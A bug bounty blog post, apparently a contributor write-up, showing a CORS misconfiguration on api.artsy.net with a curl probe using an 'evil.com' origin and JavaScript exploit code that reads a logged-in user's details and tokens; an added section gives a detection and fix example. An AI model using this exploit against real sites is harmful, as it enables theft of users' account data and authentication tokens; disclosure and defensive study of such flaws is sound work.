Exploiting Insecure Cross Origin Resource Sharing ( CORS ) | api.artsy.net
This post is published by Muhammad Khizer Javed as a contributor on BugBountyPOC. Note that the post is written by Muhammad Khizer Javed, and any mistake in the writing is his alone. We allow anyone to write content on our blog as a guest/contributor so others can also learn. If you're interested in sharing your findings through the Bug Bounty POC platform, just sign up on the blog and you can post freely.
Hello BugBountyPOC viewers, this is Khizer. A few days ago I was testing different sites for CORS (Cross Origin Resource Sharing) issues so that I could see what it actually is, since it took me about a week to understand it from different sources and blogs. I found a website that was vulnerable and tried to see what I could do with the CORS issue on it.
To test the website for a CORS issue I first used curl, sending a request with an attacker-controlled Origin header and asking only for the response headers:
    curl https://api.artsy.net -H "Origin: https://evil.com" -I
As you can see, the response to the curl request includes
Access-Control-Allow-Credentials: true
and
Access-Control-Allow-Origin: https://evil.com
Together these mean the server reflects an arbitrary origin and still allows credentials, so the website is vulnerable to a CORS attack. I then followed up with GeekBoy's blog post, as he clearly shares the exploit for this CORS issue. I found an API endpoint where I can see the details of the logged-in user:
https://api.artsy.net/api/user_details/
Well, I used the exploit code shared by GeekBoy to check whether I could export the user info from that page, which includes:
id, date created, email, birthday, phone, authentication_token, reset_password_token, collections, devices, etc.
Exploit code:
    function cors() {
      var xhttp = new XMLHttpRequest();
      xhttp.onreadystatechange = function() {
        if (this.readyState == 4 && this.status == 200) {
          // The cross-origin response body is readable because the server
          // echoed our Origin and allowed credentials; show it to the user.
          alert(this.responseText);
        }
      };
      xhttp.open("GET", "https://api.artsy.net/api/user_details/<User-ID>", true);
      // Send the victim's api.artsy.net cookies along with the request.
      xhttp.withCredentials = true;
      xhttp.send();
    }
I uploaded the exploit with my PoC on my website.
Now, if a logged-in user opens the exploit page on my website, their account information is exported to my website: the browser attaches their api.artsy.net cookies because withCredentials is set, and the reflected Access-Control-Allow-Origin lets my page read the response.
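The two checks a defender wants from this writeup, as an added example that is not part of the original post or of GeekBoy's code: a classifier for the headers a probe like the curl command above returns (so the "reflected origin plus credentials" case is flagged automatically), and the server-side reply that fixes it (exact-match allowlist, never reflection, with Vary: Origin). The hostnames and the sample headers are constructed.

```javascript
// Added example, not from the original post. Classify the CORS headers returned
// for a probe sent with `probeOrigin`. Header names are lower-cased, as Node's
// http module exposes them.
function assessCors(probeOrigin, headers) {
  const acao = headers["access-control-allow-origin"];
  const acac = String(headers["access-control-allow-credentials"] || "").toLowerCase() === "true";
  if (acao === undefined) return "no-cors";                 // browser blocks the read
  if (acao === "*") return acac ? "invalid-star-with-credentials" : "public-wildcard";
  if (acao === "null" && acac) return "null-origin-with-credentials"; // sandboxed iframes can claim "null"
  if (acao === probeOrigin) {
    // Echoing an arbitrary Origin is the misconfiguration in this post; with
    // credentials it exposes authenticated API responses to any site.
    return acac ? "reflected-origin-with-credentials" : "reflected-origin";
  }
  return "fixed-origin";
}

// Safe server-side reply: allow only exact allowlisted origins, never reflect
// whatever the client sent, and emit Vary: Origin so caches store one copy
// per origin instead of serving an allowed origin's headers to another.
function corsHeadersFor(requestOrigin, allowlist) {
  if (!allowlist.has(requestOrigin)) {
    return { "Vary": "Origin" };   // no Access-Control-Allow-Origin => read is blocked
  }
  return {
    "Access-Control-Allow-Origin": requestOrigin,
    "Access-Control-Allow-Credentials": "true",
    "Vary": "Origin",
  };
}

// Constructed sample: the kind of headers the post's curl probe received.
const sampleVulnerable = {
  "access-control-allow-origin": "https://evil.com",
  "access-control-allow-credentials": "true",
};

// Constructed allowlist for the hardened reply (placeholder hostname).
const trustedOrigins = new Set(["https://app.example.test"]);

console.log(assessCors("https://evil.com", sampleVulnerable));            // reflected-origin-with-credentials
console.log(corsHeadersFor("https://evil.com", trustedOrigins));           // { Vary: 'Origin' }
console.log(corsHeadersFor("https://app.example.test", trustedOrigins));   // allowlisted origin echoed back
```

Running the probe from several different Origin values and comparing the classification catches servers that only reflect origins matching a loose regex (for example any origin ending in the company's domain), which a single test would miss.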
Video
At the end I would like to thank GeekBoy and all the other blog posts that helped me understand and exploit this issue successfully.
Thanks.
Bounty?
Well, they didn't give anything: they said it was valid, then said it was a duplicate of an internal finding, so I thought I should share it with you guys.
Many companies say it's a duplicate or not valid; don't know whether they are fixing it silently or just not serious about security.
Very nice bro keep it up
Thanks bro 🙂
Hi Muhammad,
I checked this exploit on my target, but it doesn't work with an Authorization: Bearer header.
So do you know how we bypass this? (withCredentials was set to true)
How to remediate this issue?
Amazing PoC Bro…